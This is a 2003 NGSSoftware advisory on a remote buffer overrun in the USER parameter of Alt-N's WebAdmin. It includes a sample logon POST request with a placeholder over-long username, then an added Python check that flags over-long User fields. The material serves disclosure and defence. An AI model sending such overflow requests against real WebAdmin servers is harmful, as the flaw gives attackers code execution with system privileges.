NGSSoftware Insight Security Research Advisory

Name: Remote System Buffer Overrun WebAdmin.exe
Systems Affected: Windows
Severity: High Risk
Category: Buffer Overrun
Vendor URL: http://www.altn.com/
Author: Mark Litchfield (mark@ngssoftware.com)
Date: 24th June 2003
Advisory number: #NISR2406-03

Description
***********

WebAdmin allows administrators to securely manage MDaemon, RelayFax, and WorldClient from anywhere in the world.

Details
*******

There is a remotely exploitable buffer overrun in the USER parameter. By default the webadmin.exe process is started as a system service. Any code passed to the server by an attacker as a result of this buffer overrun would therefore (based on a default install) execute with system privileges.

POST /WebAdmin.dll?View=Logon HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ngssoftware.com:1000/
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: MyUser Agent
Host: NGSSoftware.com
Content-Length: 74
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: User=NGSSOFTWARE; Lang=en; Theme=Standard

User=LONGSTRING&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In

Fix Information
***************

NGSSoftware alerted ALTN to these issues on the 19th of June 2003. A patch has now been made available from

ftp://ftp.altn.com/WebAdmin/Release/wa205_en.exe

A check for these issues has been added to Typhon III, of which more information is available from the NGSSoftware website, http://www.ngssoftware.com

Further Information
*******************

For further information about the scope and effects of buffer overflows, please see

http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf
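
Added example (not part of the NGSSoftware advisory or of ALTN's code): a defensive check that a reverse proxy or log-review script could run over captured requests to flag an over-long User field in the logon POST shown under Details. The 64-byte limit, the function names and the webadmin.example host are assumptions made for illustration; the advisory does not state the length at which the overrun occurs.

```python
from urllib.parse import urlsplit, parse_qs

# Assumed policy limit: the advisory does not state how long User must be to overrun.
MAX_USER_LEN = 64

def sample_request(user: str) -> bytes:
    """Constructed sample: a logon POST shaped like the one in the advisory."""
    body = f"User={user}&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In"
    head = ("POST /WebAdmin.dll?View=Logon HTTP/1.1\r\n"
            "Host: webadmin.example\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n")
    return (head + body).encode("latin-1")

def check_logon_request(raw: bytes, max_len: int = MAX_USER_LEN) -> list:
    """Return findings for a WebAdmin logon POST; an empty list means nothing flagged."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    try:
        method, target, _version = request_line.split(" ", 2)
        url = urlsplit(target)
    except ValueError:
        return ["malformed request line"]
    query = {k.lower(): v for k, v in parse_qs(url.query).items()}
    is_logon = (method == "POST"
                and url.path.lower().endswith("/webadmin.dll")
                and [v.lower() for v in query.get("view", [])] == ["logon"])
    if not is_logon:
        return []
    # latin-1 maps each byte to one character, so len() below counts decoded bytes.
    form = parse_qs(body.decode("latin-1"), keep_blank_values=True, encoding="latin-1")
    findings = []
    for name, values in form.items():
        if name.lower() != "user":  # the advisory writes the field as both USER and User
            continue
        for value in values:        # repeated User fields are each checked
            if len(value) > max_len:
                findings.append(f"User field is {len(value)} bytes (limit {max_len})")
    return findings

if __name__ == "__main__":
    for user in ("admin", "A" * 300, "%41" * 100):
        print(len(user), check_logon_request(sample_request(user)))
```

The length is measured after percent-decoding, so an encoded value is judged by the size the server-side handler would receive rather than by its size on the wire.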